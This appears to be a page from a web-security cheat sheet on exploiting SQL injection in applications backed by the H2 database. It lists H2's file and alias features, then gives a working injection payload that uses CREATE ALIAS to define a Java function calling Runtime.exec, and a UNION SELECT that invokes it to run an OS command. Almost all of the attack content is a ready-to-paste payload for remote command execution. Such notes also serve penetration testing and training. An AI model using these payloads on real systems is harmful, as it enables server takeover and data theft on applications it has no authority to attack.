Ctrlk
For the complete documentation index, see llms.txt. This page is also available as Markdown.

WEB

SQL Injection

H2 Database Exploit ALIAS Sql Injection (Java)

The H2 engine uses several defined functions and commands to interact with the database. The noteworthy ones are :

  • FILE_READ: Returns the contents of a file. (function)

  • FILE_WRITE: Write the supplied parameter into a file.(function)

  • CSVWRITE: Writes a CSV (comma separated values). (function)

  • CREATE ALIAS: Creates a new function alias. (command).

We can Create an Alias and then we Can Run our SQL Queries to exploit this Case Scenario

1'; CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next() : ""; }'; --

after that you can do 

1' union select 1,2,execve('whoami')-- # this should get executed

PreviousSignUp PageNextRegex Bypass

Last updated